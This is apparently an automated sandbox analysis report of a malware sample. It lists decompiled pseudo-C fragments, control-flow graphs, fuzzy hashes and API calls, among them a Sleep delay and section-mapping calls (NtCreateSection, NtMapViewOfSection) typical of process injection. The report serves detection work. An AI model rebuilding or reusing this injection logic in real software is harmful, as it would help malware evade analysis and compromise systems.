                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                    • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                    • Instruction ID: 8582929191403591d44e29425f889cf15a6ebc1e7c6ce686fd1fc5d14ca458fe
                                                                                                                                    • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                    • Instruction Fuzzy Hash: 3D113F79A00208EFDB01DF98C985E99BBF5EF08750F058094F9489B362D771EA90DF80
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 319 401920-401967 call 401271 Sleep call 40149e 329 401976-40197c 319->329 330 401969-401971 call 40156b 319->330 333 401982-401988 329->333 334 40198c 329->334 330->329 335 40198f-4019a8 call 401271 333->335 334->333 334->335
                                                                                                                                    C-Code - Quality: 20%
                                                                                                                                    			E00401920(void* __eax, void* __ebx, void* __edi, void* __eflags, void* __fp0) {
                                                                                                                                    				void* _t13;
                                                                                                                                    				void* _t15;
                                                                                                                                    				intOrPtr* _t19;
                                                                                                                                    				void* _t23;
                                                                                                                                    				void* _t27;
                                                                                                                                    
                                                                                                                                    				_t32 = __eflags;
                                                                                                                                    				_t24 = __edi;
                                                                                                                                    				asm("in eax, dx");
                                                                                                                                    				_push(0x5a);
                                                                                                                                    				L00401271(0x194a, __ebx, __edi, __eflags);
                                                                                                                                    				_t19 =  *((intOrPtr*)(_t27 + 8));
                                                                                                                                    				Sleep(0x1388);
                                                                                                                                    				_push(_t27 - 4);
                                                                                                                                    				_push( *((intOrPtr*)(_t27 + 0x10)));
                                                                                                                                    				_push( *((intOrPtr*)(_t27 + 0xc)));
                                                                                                                                    				_push(_t19); // executed
                                                                                                                                    				_t13 = E0040149E(_t23, _t32); // executed
                                                                                                                                    				_t33 = _t13;
                                                                                                                                    				if(_t13 != 0) {
                                                                                                                                    					E0040156B(_t23, _t33, __fp0, _t19, _t13,  *((intOrPtr*)(_t27 - 4)),  *((intOrPtr*)(_t27 + 0x14))); // executed
                                                                                                                                    				}
                                                                                                                                    				 *_t19(0xffffffff, 0);
                                                                                                                                    				_t15 = 0x194a;
                                                                                                                                    				_push(0x5a);
                                                                                                                                    				return L00401271(_t15, _t19, _t24, _t33);
                                                                                                                                    			}








                                                                                                                                    0x00401920
                                                                                                                                    0x00401920
                                                                                                                                    0x00401922
                                                                                                                                    0x00401936
                                                                                                                                    0x00401945
                                                                                                                                    0x0040194a
                                                                                                                                    0x00401952
                                                                                                                                    0x00401958
                                                                                                                                    0x00401959
                                                                                                                                    0x0040195c
                                                                                                                                    0x0040195f
                                                                                                                                    0x00401960
                                                                                                                                    0x00401965
                                                                                                                                    0x00401967
                                                                                                                                    0x00401971
                                                                                                                                    0x00401971
                                                                                                                                    0x0040197a
                                                                                                                                    0x00401987
                                                                                                                                    0x00401995
                                                                                                                                    0x004019a8

                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 00401952
                                                                                                                                      • Part of subcall function 0040156B: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401615
                                                                                                                                      • Part of subcall function 0040156B: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401642
                                                                                                                                      • Part of subcall function 0040156B: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401665
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423442434.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1885482327-0
                                                                                                                                    • Opcode ID: fa457398f710ccbbcac173ae2a84a174dd9d273bb895b75a58168b19d9a0e31f
                                                                                                                                    • Instruction ID: 224bb2ef0974229b5a5fdcef52df60c5cd3bf8ec0745870aca08fc2285a6eed9
                                                                                                                                    • Opcode Fuzzy Hash: fa457398f710ccbbcac173ae2a84a174dd9d273bb895b75a58168b19d9a0e31f
                                                                                                                                    • Instruction Fuzzy Hash: 6EF086B5204105FBDB009B949C61EBA77259F05361F204437F617B90F1C53C8513E62B
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 341 40192a-401967 call 401271 Sleep call 40149e 352 401976-40197c 341->352 353 401969-401971 call 40156b 341->353 356 401982-401988 352->356 357 40198c 352->357 353->352 358 40198f-4019a8 call 401271 356->358 357->356 357->358
                                                                                                                                    C-Code - Quality: 24%
                                                                                                                                    			E0040192A(void* __edi, void* __eflags, void* __fp0) {
                                                                                                                                    				void* _t11;
                                                                                                                                    				void* _t13;
                                                                                                                                    				intOrPtr* _t17;
                                                                                                                                    				void* _t21;
                                                                                                                                    				void* _t25;
                                                                                                                                    
                                                                                                                                    				_t30 = __eflags;
                                                                                                                                    				_t22 = __edi;
                                                                                                                                    				_push(0x5a);
                                                                                                                                    				L00401271(0x194a, 0xcd, __edi, __eflags);
                                                                                                                                    				_t17 =  *((intOrPtr*)(_t25 + 8));
                                                                                                                                    				Sleep(0x1388);
                                                                                                                                    				_push(_t25 - 4);
                                                                                                                                    				_push( *((intOrPtr*)(_t25 + 0x10)));
                                                                                                                                    				_push( *((intOrPtr*)(_t25 + 0xc)));
                                                                                                                                    				_push(_t17); // executed
                                                                                                                                    				_t11 = E0040149E(_t21, _t30); // executed
                                                                                                                                    				_t31 = _t11;
                                                                                                                                    				if(_t11 != 0) {
                                                                                                                                    					E0040156B(_t21, _t31, __fp0, _t17, _t11,  *((intOrPtr*)(_t25 - 4)),  *((intOrPtr*)(_t25 + 0x14))); // executed
                                                                                                                                    				}
                                                                                                                                    				 *_t17(0xffffffff, 0);
                                                                                                                                    				_t13 = 0x194a;
                                                                                                                                    				_push(0x5a);
                                                                                                                                    				return L00401271(_t13, _t17, _t22, _t31);
                                                                                                                                    			}








                                                                                                                                    0x0040192a
                                                                                                                                    0x0040192a
                                                                                                                                    0x00401936
                                                                                                                                    0x00401945
                                                                                                                                    0x0040194a
                                                                                                                                    0x00401952
                                                                                                                                    0x00401958
                                                                                                                                    0x00401959
                                                                                                                                    0x0040195c
                                                                                                                                    0x0040195f
                                                                                                                                    0x00401960
                                                                                                                                    0x00401965
                                                                                                                                    0x00401967
                                                                                                                                    0x00401971
                                                                                                                                    0x00401971
                                                                                                                                    0x0040197a
                                                                                                                                    0x00401987
                                                                                                                                    0x00401995
                                                                                                                                    0x004019a8

                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 00401952
                                                                                                                                      • Part of subcall function 0040156B: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401615
                                                                                                                                      • Part of subcall function 0040156B: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401642
                                                                                                                                      • Part of subcall function 0040156B: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401665
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423442434.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1885482327-0
                                                                                                                                    • Opcode ID: 161dd5c3976c9ce7274e1749465a990bb93717c16a02162c3fc6a3195a2b6edd
                                                                                                                                    • Instruction ID: 9248d4b3e658d46e670c13ad7b2d26eba18d2d49d4b0dc53c33eada2e420f8d1
                                                                                                                                    • Opcode Fuzzy Hash: 161dd5c3976c9ce7274e1749465a990bb93717c16a02162c3fc6a3195a2b6edd
                                                                                                                                    • Instruction Fuzzy Hash: 1DF06DB6208104EBDB00AA949C61EBA3625AB05361F204437BA17B90F1C53C8612EA2B
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 364 40192e-401967 call 401271 Sleep call 40149e 373 401976-40197c 364->373 374 401969-401971 call 40156b 364->374 377 401982-401988 373->377 378 40198c 373->378 374->373 379 40198f-4019a8 call 401271 377->379 378->377 378->379
                                                                                                                                    C-Code - Quality: 20%
                                                                                                                                    			E0040192E(void* __ebx, void* __edi, void* __eflags, void* __fp0) {
                                                                                                                                    				void* _t8;
                                                                                                                                    				void* _t11;
                                                                                                                                    				void* _t13;
                                                                                                                                    				intOrPtr* _t17;
                                                                                                                                    				void* _t21;
                                                                                                                                    				void* _t25;
                                                                                                                                    
                                                                                                                                    				_t30 = __eflags;
                                                                                                                                    				_t22 = __edi;
                                                                                                                                    				asm("out dx, al");
                                                                                                                                    				_push(0x5a);
                                                                                                                                    				L00401271(_t8, __ebx, __edi, __eflags);
                                                                                                                                    				_t17 =  *((intOrPtr*)(_t25 + 8));
                                                                                                                                    				Sleep(0x1388);
                                                                                                                                    				_push(_t25 - 4);
                                                                                                                                    				_push( *((intOrPtr*)(_t25 + 0x10)));
                                                                                                                                    				_push( *((intOrPtr*)(_t25 + 0xc)));
                                                                                                                                    				_push(_t17); // executed
                                                                                                                                    				_t11 = E0040149E(_t21, _t30); // executed
                                                                                                                                    				_t31 = _t11;
                                                                                                                                    				if(_t11 != 0) {
                                                                                                                                    					E0040156B(_t21, _t31, __fp0, _t17, _t11,  *((intOrPtr*)(_t25 - 4)),  *((intOrPtr*)(_t25 + 0x14))); // executed
                                                                                                                                    				}
                                                                                                                                    				 *_t17(0xffffffff, 0);
                                                                                                                                    				_t13 = 0x194a;
                                                                                                                                    				_push(0x5a);
                                                                                                                                    				return L00401271(_t13, _t17, _t22, _t31);
                                                                                                                                    			}









                                                                                                                                    0x0040192e
                                                                                                                                    0x0040192e
                                                                                                                                    0x0040192e
                                                                                                                                    0x00401936
                                                                                                                                    0x00401945
                                                                                                                                    0x0040194a
                                                                                                                                    0x00401952
                                                                                                                                    0x00401958
                                                                                                                                    0x00401959
                                                                                                                                    0x0040195c
                                                                                                                                    0x0040195f
                                                                                                                                    0x00401960
                                                                                                                                    0x00401965
                                                                                                                                    0x00401967
                                                                                                                                    0x00401971
                                                                                                                                    0x00401971
                                                                                                                                    0x0040197a
                                                                                                                                    0x00401987
                                                                                                                                    0x00401995
                                                                                                                                    0x004019a8

                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 00401952
                                                                                                                                      • Part of subcall function 0040156B: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401615
                                                                                                                                      • Part of subcall function 0040156B: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401642
                                                                                                                                      • Part of subcall function 0040156B: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401665
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423442434.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1885482327-0
                                                                                                                                    • Opcode ID: 35fb89e9c4f30cbfeaafd84edc25f65ffe16ed0339dce68ade91ea6c2d2cce69
                                                                                                                                    • Instruction ID: e24f51b341499e2e26426f908677bffa000874d55709296b6d837b784a8f1a12
                                                                                                                                    • Opcode Fuzzy Hash: 35fb89e9c4f30cbfeaafd84edc25f65ffe16ed0339dce68ade91ea6c2d2cce69
                                                                                                                                    • Instruction Fuzzy Hash: 35F044B6204105F7DB00AF949C61EBA76259F05761F204577BA17B90F1C53D8512EB2B
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 00401952
                                                                                                                                      • Part of subcall function 0040156B: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401615
                                                                                                                                      • Part of subcall function 0040156B: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401642
                                                                                                                                      • Part of subcall function 0040156B: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401665
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423442434.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1885482327-0
                                                                                                                                    • Opcode ID: 3e9a934ec199537abd16a0822f7778398e235c390a1290865f6cc20ec1f95f8b
                                                                                                                                    • Instruction ID: 67248cb6658f2556eaba37909da5001fde87a2f9067ac25d4feca41700aa7417
                                                                                                                                    • Opcode Fuzzy Hash: 3e9a934ec199537abd16a0822f7778398e235c390a1290865f6cc20ec1f95f8b
                                                                                                                                    • Instruction Fuzzy Hash: 44F0A476204205EBDB00AFA49C51DBE7725AF04754F200577BA12B90F1CA788512EB2B
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423634803.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ___getlocaleinfo
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1937885557-0
                                                                                                                                    • Opcode ID: a733a845800b9d0324a0597bd19bae0573c949fb87b203669346ded8062b8147
                                                                                                                                    • Instruction ID: b919f6320c1c295966b8fa31f6b0fbf240553a21a70b5c3ddeff3f9e684a3217
                                                                                                                                    • Opcode Fuzzy Hash: a733a845800b9d0324a0597bd19bae0573c949fb87b203669346ded8062b8147
                                                                                                                                    • Instruction Fuzzy Hash: C4E1DEB2D4020DBEEB11DAF1CE41DFF77BDEB04788F14051AB215D3041EAB4AA559B64
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423634803.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __lock$___addlocaleref__crt_waiting_on_module_handle
                                                                                                                                    • String ID: 8 @$8'@
                                                                                                                                    • API String ID: 1628550938-4035843712
                                                                                                                                    • Opcode ID: e5dfe49b74982ea4eb3bd2a0c096091ff92c662d858be515e613f67f6d29ed87
                                                                                                                                    • Instruction ID: 3e8a8f234247fc9f43caf3cc0660697beda9ec2e50f6ff30b4da4c9b5f892732
                                                                                                                                    • Opcode Fuzzy Hash: e5dfe49b74982ea4eb3bd2a0c096091ff92c662d858be515e613f67f6d29ed87
                                                                                                                                    • Instruction Fuzzy Hash: B5118E719047019AD720AF7A9945B9ABBE0AF04314F10853FE499B23E0C7B89949CF5D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.431462831.00000000008C1000.00000040.00000020.00020000.00000000.sdmp, Offset: 008C1000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_8c1000_file.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: eb642a4c07712a292576bf27addb56e6773bb13640269c2f77cbfa3c7ea58c9b
                                                                                                                                    • Instruction ID: 615f6e51d305723627eaa350a90efbfe5e4541b150367f163866f8d42aadd46a
                                                                                                                                    • Opcode Fuzzy Hash: eb642a4c07712a292576bf27addb56e6773bb13640269c2f77cbfa3c7ea58c9b
                                                                                                                                    • Instruction Fuzzy Hash: A6A2566554E3C09FD7038B7898A8A907FB0AE27254B0E05DBD0C4CF1B3D628AD1DDB66
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423634803.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                    • Instruction ID: b5da265a60cb7678d9dc6637830cfe2bff925994d81e0ef6bb126d56377ff169
                                                                                                                                    • Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
                                                                                                                                    • Instruction Fuzzy Hash: 75D17073C1E9F38A8735812D40546BBEEA26FD175131EC3E29CD42F38D922AAD8095D4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423634803.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                    • Instruction ID: f7de195861aae08beb2435b80fd5af693b6193b5232d54c8099989ba6ab4a7ed
                                                                                                                                    • Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
                                                                                                                                    • Instruction Fuzzy Hash: ABD17173D0E9B38A8735812D40586BBEAA26FD175531FC3E29CD42F38DD22A9D8095D8
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423634803.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                    • Instruction ID: 190cc8bfab72ae78c13d179a1954878a2a04f91532c633f35e0483fb27d1b740
                                                                                                                                    • Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
                                                                                                                                    • Instruction Fuzzy Hash: 5BC19073C0E9F34A8736812D40546ABEEA26FD175031FC3E28CD43F78D922AAD8595D8
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423634803.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                    • Instruction ID: a7bde66524b56c3b0261efba869263ea0f07a0d295d7f28fbb646330092ae1ee
                                                                                                                                    • Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
                                                                                                                                    • Instruction Fuzzy Hash: DCC18D73D0E9F30A8735812D40586ABEAA26FD175532FC3E29CD42F38DD22AAD8185D4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423442434.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8ebd79d4caf74b9a7172936fa01fc20e6365692032ba0e0a284ad6e5f62f7c6e
                                                                                                                                    • Instruction ID: 6a3855b801d8b72e8ba3316ff7e8b1568ed9570b33e8d4f67d02298b4ce90215
                                                                                                                                    • Opcode Fuzzy Hash: 8ebd79d4caf74b9a7172936fa01fc20e6365692032ba0e0a284ad6e5f62f7c6e
                                                                                                                                    • Instruction Fuzzy Hash: AE816A36418782CAC7369F34D5911D2FFF1BF4A70474849ADC5D786882D328B267C75A
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423634803.0000000000409000.00000020.00000001.01000000.00000003.sdmp, Offset: 00409000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_409000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                    • Instruction ID: 880d04d1417105f4c3976921ed4dbe9b372880db678eedf41ac873f5a78ea455
                                                                                                                                    • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                    • Instruction Fuzzy Hash: 2A11B17720109243D6148A2EB4B86A7B3B5FBC533172D427BE0426B7DAE13ABD459608
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423442434.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: aea6d2f1c1b98ad06cbdec59f2325e2c5333d6c8fa13b16d40c970ed3e6b7d5d
                                                                                                                                    • Instruction ID: 3bcd0e2288eda4060afe81734e62d0be7380ac6ae20b88ca300affe1451fe799
                                                                                                                                    • Opcode Fuzzy Hash: aea6d2f1c1b98ad06cbdec59f2325e2c5333d6c8fa13b16d40c970ed3e6b7d5d
                                                                                                                                    • Instruction Fuzzy Hash: FC11A63240420ADFCB00EB81E98A9D6B370FB95748B1009BDEA126B0D5F2717227D75B
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423442434.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5c49fa6d280e3267fd4df12e03e6d43de081cd2d69c6290cc715faeafd1b4a7a
                                                                                                                                    • Instruction ID: 80374ff71acb4e40a99ba9fdabce2cbcc8f730c7eeba908dfc5354750a062123
                                                                                                                                    • Opcode Fuzzy Hash: 5c49fa6d280e3267fd4df12e03e6d43de081cd2d69c6290cc715faeafd1b4a7a
                                                                                                                                    • Instruction Fuzzy Hash: 2C11F93240420ADFCB00FF81E98A8D6B370FB96748B1009BCEA122B0C6F2706226C357
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.431462831.00000000008C1000.00000040.00000020.00020000.00000000.sdmp, Offset: 008C1000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_8c1000_file.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                    • Instruction ID: f6550d56bd8840946884a60f9d5de49aff0d2398ffdedf79cb93f56172e0f359
                                                                                                                                    • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                    • Instruction Fuzzy Hash: D211AC72340510AFDB04CE5ADCC1FA273EAFB88360B298169E908CB316E675EC42C760
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423442434.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8ee28eb25af3a23bc7bae32041a3823241c2669144bb8117cec100e4cba8df15
                                                                                                                                    • Instruction ID: 0b30bc7017b0a7d68a1e04374eae7e5ef415df0775d2272070ddb73ea2bddc06
                                                                                                                                    • Opcode Fuzzy Hash: 8ee28eb25af3a23bc7bae32041a3823241c2669144bb8117cec100e4cba8df15
                                                                                                                                    • Instruction Fuzzy Hash: 4511EB3790020ACFCB15FF41E4CA8C5B372FB8A348B040AACDE125B095F3316226C756
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423442434.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d3830038f128970d9f29de35507e5eb5d34c1af6015ca2dbf72337fda079964f
                                                                                                                                    • Instruction ID: 06435867d3c439af725eba92724c2eb6d34bb3774f051ce35eb0f5e7c3b98355
                                                                                                                                    • Opcode Fuzzy Hash: d3830038f128970d9f29de35507e5eb5d34c1af6015ca2dbf72337fda079964f
                                                                                                                                    • Instruction Fuzzy Hash: D511887790020ACFCB15EF41E4C65D5B371FB9A348B140AACDE125B095F3316226D756
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.423442434.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 738638b488f9a4c012ccbe76e1d266a201faaea941e68a25858ff1fdfcccf258
                                                                                                                                    • Instruction ID: 947e0effc2f4e57c8cb4d65273482cb1c2685da776775f1305328036b4f14a7b
                                                                                                                                    • Opcode Fuzzy Hash: 738638b488f9a4c012ccbe76e1d266a201faaea941e68a25858ff1fdfcccf258
